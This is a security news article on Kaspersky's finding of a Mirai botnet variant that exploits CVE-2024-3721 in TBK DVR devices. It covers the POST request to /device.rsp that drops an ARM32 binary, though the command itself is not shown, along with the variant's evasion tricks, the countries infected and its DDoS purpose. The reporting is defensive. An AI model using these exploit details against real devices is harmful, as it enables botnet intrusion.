Kaspersky researchers have uncovered a fresh wave of attacks exploiting CVE-2024-3721 to deploy a revamped variant of the notorious Mirai botnet — and this time, the target is a vulnerable class of DVR-based surveillance systems.
The attack starts with a POST request sent to a vulnerable TBK DVR endpoint (/device.rsp), embedding a Linux shell command disguised in the payload:
This one-liner downloads and executes an ARM32 binary — no need for architecture probing. The attack is optimized for speed, efficiency, and targeting devices where this architecture is guaranteed.
“Typically, bot infections involve shell scripts that initially survey the target machine… However, in this case… the reconnaissance stage is unnecessary,” explains Kaspersky.
While this bot is based on the Mirai source code released nearly a decade ago, it includes several modern twists:
- RC4-encrypted strings using XOR-obfuscated keys
- Anti-virtualization checks for VMware and QEMU
- Process inspection via /proc/[pid]/cmdline
- Execution directory validation
These additions are meant to make analysis harder and minimize detection in sandboxed environments.
“The data decryption routine in this variant is implemented as a simple RC4 algorithm… The decrypted RC4 key is used to decrypt the strings,” the researchers state.
According to Kaspersky’s telemetry data, the majority of infected systems are located in:
- China
- India
- Egypt
- Ukraine
- Russia
- Turkey
- Brazil
With over 50,000 publicly exposed DVR devices identified via public scans, the botnet’s potential growth vector is significant.
Once deployed, the malware connects to a command-and-control (C2) server and awaits instructions — most likely for Distributed Denial-of-Service (DDoS) attacks or other mass exploitation activities.
“The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks),” Kaspersky warns.
Interestingly, the malware does not achieve long-term persistence on many devices. If rebooted, the infection is wiped — but with bots constantly scanning the internet, reinfection is never far away.
